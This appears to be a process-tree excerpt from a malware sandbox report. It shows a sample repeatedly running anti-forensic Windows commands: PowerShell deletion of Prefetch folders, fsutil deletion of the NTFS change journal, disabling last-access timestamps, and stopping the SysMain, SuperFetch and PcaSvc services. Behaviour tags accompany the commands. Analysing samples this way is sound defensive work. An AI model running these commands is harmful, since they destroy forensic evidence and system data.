C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,13535255263110697643,4976725457456784480,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:14⤵PID:4772
-
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5364
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:5412
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵
- Launches sc.exe
PID:5460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5188
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵PID:5356
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5364
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Enumerates connected drives
PID:5452
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵
- Launches sc.exe
PID:5496
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:5588
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:5640
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:5692
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5736
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:5796
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵
- Launches sc.exe
PID:5876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:5784
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Enumerates connected drives
PID:5540
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
PID:6068
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:4572
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:2420
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:2424
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:1196
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5172
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:6100
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:6072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5476
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:5688
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Enumerates connected drives
PID:4732
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5736
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵
- Launches sc.exe
PID:5868
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:1564
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:5944
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵
- Launches sc.exe
PID:4300
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5996
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:4452
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵
- Launches sc.exe
PID:3224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:4772
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:6132
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:6112
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:656
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:5320
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:5200
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:5252
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5376
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:5460
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:5412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:5884
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:3912
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
PID:4904
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:3240
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:5608
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵
- Launches sc.exe
PID:1776
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:4216
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5532
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:5852
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:5604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:1196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5308
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵PID:4556
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5468
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Enumerates connected drives
PID:5356
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:5656
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:5628
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:5764
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:5772
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:720
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:3944
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:5924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5004
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:6128
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:2820
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Enumerates connected drives
PID:388
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:5132
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:4952
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵
- Launches sc.exe
PID:6092
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:1608
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5224
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:5308
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:5444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:5600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:5640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:4676
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵PID:3448
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5796
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Enumerates connected drives
PID:4300
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:3440
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:3220
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:2860
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵
- Launches sc.exe
PID:1808
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:1872
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:5152
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:1584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:3244
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:5324
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5316
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:6096
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵
- Launches sc.exe
PID:6028
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:5328
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:3836
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵
- Launches sc.exe
PID:5336
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:2492
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:5416
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:5596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:5708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5840
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:4644
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5888
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:3608
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵
- Launches sc.exe
PID:2384
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:4968
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:5508
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:5808
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:948
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:5520
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵
- Launches sc.exe
PID:1880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:1584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:2916
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵PID:6060
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Enumerates connected drives
PID:6116
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Enumerates connected drives
PID:984
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:5472
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:5368
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵
- Launches sc.exe
PID:5276
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:4692
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5200
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:5496
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:5680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:3872
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:3440
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5296
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:720
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:4904
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵
- Launches sc.exe
PID:4960
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵
- Launches sc.exe
PID:5508
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:2764
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:2248
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:5340
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:5532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:1296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:4768
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵PID:6104
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:6076
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:4952
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:5320
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:984
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:1608
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:3836
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:3792
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:5444
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:5596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:5556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:1896
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:3576
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Enumerates connected drives
PID:5108
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:4504
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:4640
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:5552
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:5152
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:1244
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:2204
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵PID:5812
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:3620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:3512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:2424
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵
- Deletes NTFS Change Journal
PID:5284
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:1480
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:5320
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:2176
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:1608
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:5436
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:5384
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:5732
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:4448
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:5880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'C:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'D:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵PID:5864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Remove-Item 'F:\Windows\Prefetch\*' -force -recurse -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4936
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d C:3⤵PID:3240
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d D:3⤵
- Enumerates connected drives
PID:4484
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil usn deletejournal /d F:3⤵
- Deletes NTFS Change Journal
- Enumerates connected drives
PID:208
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SysMain"3⤵PID:2488
-
-
C:\Windows\SYSTEM32\sc.exesc config "SysMain" start=disabled3⤵PID:816
-
-
C:\Windows\SYSTEM32\sc.exesc stop "SuperFetch"3⤵PID:4408
-
-
C:\Windows\SYSTEM32\sc.exesc config "SuperFetch" start=disabled3⤵PID:3084
-
-
C:\Windows\SYSTEM32\fsutil.exefsutil behavior set disablelastaccess 13⤵PID:6012
-
-
C:\Windows\SYSTEM32\sc.exesc stop "PcaSvc"3⤵
- Launches sc.exe
PID:4464
-
-
C:\Windows\SYSTEM32\sc.exesc config "PcaSvc" start=disabled3⤵PID:3620
-
-
